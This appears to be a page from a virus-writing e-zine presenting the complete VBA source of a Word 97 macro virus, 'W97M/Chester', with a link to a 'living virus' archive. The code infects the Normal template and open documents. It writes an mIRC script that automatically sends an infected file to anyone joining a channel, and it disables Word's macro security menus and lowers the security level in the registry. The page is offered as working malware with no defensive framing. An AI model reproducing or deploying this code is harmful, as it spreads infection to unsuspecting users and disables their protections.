<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="14.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="16.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>W97M/Chester by ppacket</u></b>
<p><pre>VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
'W97M/Chester
Private Sub Document_Open()
'W97M/Chester
On Error Resume Next
'W97M/Chester
Set ntc = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'W97M/Chester
Set adc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
'W97M/Chester
Call stealth
'W97M/Chester
If adc.lines(1, 1) <> "'W97M/Chester" Then
'W97M/Chester
adc.insertlines 1, ntc.lines(1, ntc.countoflines)
'W97M/Chester
End If
'W97M/Chester
If ntc.lines(1, 1) <> "'W97M/Chester" Then
'W97M/Chester
ntc.insertlines 1, adc.lines(1, adc.countoflines)
End If
'W97M/Chester
If Dir("c:\mirc\mirc32.exe") <> "" Then
'W97M/Chester
Script = "c:\mirc\script.ini"
'W97M/Chester
chester = "c:\mirc\download\chester.txt.doc"
'W97M/Chester
ActiveDocument.SaveAs chester
'W97M/Chester
End If
'W97M/Chester
GoTo mirc
'W97M/Chester
If Dir("c:\Progra~1\mirc\mirc32.exe") <> "" Then
'W97M/Chester
Script = "c:\Progra~1\mirc\script.ini"
'W97M/Chester
chester = "c:\Progra~1\mirc\download\chester.txt.doc"
'W97M/Chester
ActiveDocument.SaveAs chester
'W97M/Chester
End If
'W97M/Chester
mirc:
'W97M/Chester
Open Script For Output As #1
'W97M/Chester
Print #1, "[Script]"
'W97M/Chester
Print #1, ""
'W97M/Chester
Print #1, "n0=on 1:Join:#: {"
'W97M/Chester
Print #1, "n1=/if ($nick == $me ) {Halt}"
'W97M/Chester
Print #1, "n2=/DCC Send chester"
'W97M/Chester
Print #1, "n3=/Clear"
'W97M/Chester
Print #1, "n4=/MOTD"
'W97M/Chester
Print #1, "n5=}"
'W97M/Chester
Close #1
'W97M/Chester
End Sub
'W97M/Chester
Sub stealth()
'W97M/Chester
On Error Resume Next
'W97M/Chester
CommandBars("Macro").Controls("Security").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Macro").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Options...").Enabled = 0
'W97M/Chester
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "level") = 1&
'W97M/Chester
End Sub
'W97M/Chester
Sub HelpAbout()
'W97M/Chester
On Error Resume Next
'W97M/Chester
If Day(Now) = 11 Then
'W97M/Chester
MsgBox "Ultimately there is nothing to forgive," & vbCr & "because ther is nothing to judge and " & vbCr & "no one to blame!!", vbSystemModal, "W97M/Chester"
'W97M/Chester
End If
'W97M/Chester
Dialogs(wdDialogHelpAbout).Show
'W97M/Chester
End Sub

</pre>
<p><a href="15.zip">living virus</a>
</body>
</html>
